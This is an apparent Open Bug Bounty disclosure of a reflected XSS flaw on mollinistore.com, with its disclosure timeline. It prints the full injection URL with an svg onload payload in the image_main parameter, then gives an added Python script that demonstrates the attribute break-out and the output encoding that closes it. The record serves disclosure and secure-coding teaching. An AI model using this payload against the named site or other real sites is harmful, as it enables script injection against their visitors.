mollinistore.com XSS vulnerability

2017-09-08T12:12:00
ID OBB:291150
Type openbugbounty
Reporter M0r3h4x
Modified 2017-12-07T13:38:00

Description

Vulnerable URL:
http://mollinistore.com/catalog/view/theme/_ajax_view-product.php?product_href=http%3A%2F%2Fmollinistore.com%2Fmollini%2Fzyrandol-olivia-dream-black%3Fpage%3D2&view_details=View+details&image_main=xss%22%3E%3Csvg/onload=prompt(/openbugbounty/)%3E&product_name=OLIVIA+DREAM+BLACK&product_price=2%2C490.00PLN&product_special=1%2C743.00PLN&product_rating=0&product_description_short=8+arms+chandelier+called+Olivia+Dream+made+of+best+quality+blown+glass+is+a+classic+of+style.+It+att..&product_tax=&text_tax=Ex+Tax%3A&stock=6&share_f=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Fwww.facebook.com%2F%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-facebook12%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B&share_t=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Ftwitter.com%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-twitter20%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B&share_g=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Fwww.google.com%2F%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-google10%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B&share_pin=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Fwww.pinterest.com%2F%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-pinterest9%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B
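The URL above carries the payload in the `image_main` parameter: the value `xss"><svg/onload=prompt(/openbugbounty/)>` closes an attribute and its tag, then opens an `<svg>` with an event handler. The script below is an added example, not code from the report or from mollinistore.com; it decodes that parameter from the report's URL (trimmed to the first few parameters), renders it through a hypothetical `<img src="...">` template once unencoded and once with attribute-context encoding, and tokenises both outputs with Python's HTML parser to show which one yields a second tag with an `onload` handler. The two `render_*` templates are an assumption about how `_ajax_view-product.php` echoes the value; the endpoint's real PHP is not on the page.

```python
"""Reproduce the attribute break-out behind the mollinistore.com report and
show the output encoding that closes it.

Added example; not code from the Open Bug Bounty report or from
mollinistore.com.  render_unsafe/render_safe are an ASSUMED template for how
_ajax_view-product.php echoes image_main into an <img src> attribute.
"""
from __future__ import annotations

import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The report's URL, cut down to the parameters needed here (the trailing
# product_* / share_* parameters are omitted).
VULN_URL = (
    "http://mollinistore.com/catalog/view/theme/_ajax_view-product.php"
    "?product_href=http%3A%2F%2Fmollinistore.com%2Fmollini%2F"
    "zyrandol-olivia-dream-black%3Fpage%3D2"
    "&view_details=View+details"
    "&image_main=xss%22%3E%3Csvg/onload=prompt(/openbugbounty/)%3E"
    "&product_name=OLIVIA+DREAM+BLACK"
)


def injected_value(url: str, name: str = "image_main") -> str:
    """URL-decoded value of one query parameter, i.e. what the server sees."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]


def render_unsafe(image: str) -> str:
    """Hypothetical vulnerable template: the parameter is echoed verbatim."""
    return f'<img src="{image}" alt="main image">'


def render_safe(image: str) -> str:
    """Same template with attribute-context encoding.  PHP equivalent:
    htmlspecialchars($v, ENT_QUOTES, 'UTF-8').  quote=True is the part that
    matters: without it the closing double quote survives and the break-out
    still works."""
    return f'<img src="{html.escape(image, quote=True)}" alt="main image">'


class _TagCollector(HTMLParser):
    """Record every start tag and its attributes as the tokeniser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict[str, str | None]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def start_tags(markup: str) -> list[tuple[str, dict[str, str | None]]]:
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def is_exploitable(markup: str) -> bool:
    """True if anything other than the single intended <img> is tokenised, or
    if any tag carries an on* event-handler attribute."""
    tags = start_tags(markup)
    return (
        len(tags) != 1
        or tags[0][0] != "img"
        or any(a.lower().startswith("on") for _, attrs in tags for a in attrs)
    )


if __name__ == "__main__":
    payload = injected_value(VULN_URL)
    print("decoded image_main:", payload)
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = render(payload)
        names = [t for t, _ in start_tags(out)]
        print(f"{label}: {out}\n  tags={names} exploitable={is_exploitable(out)}")
```

In the unencoded rendering the tokeniser produces two start tags, `img` and `svg`, the second with an `onload` attribute; in the encoded rendering it produces only `img`, and the decoded `src` attribute equals the raw payload string, which is exactly what a browser should do with untrusted data in that position. The same check applies to the other reflected parameters in the URL (`view_details`, `product_name`, and so on) by changing `name`; which ones are actually reflected unencoded is not stated in the report.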
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 07.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 8154187
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 September, 2017 12:12 GMT
Generic security notifications sent to website owner| 8 September, 2017 12:15 GMT
Notification sent to subscribers (without technical details)| 8 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 7 December, 2017 13:38 GMT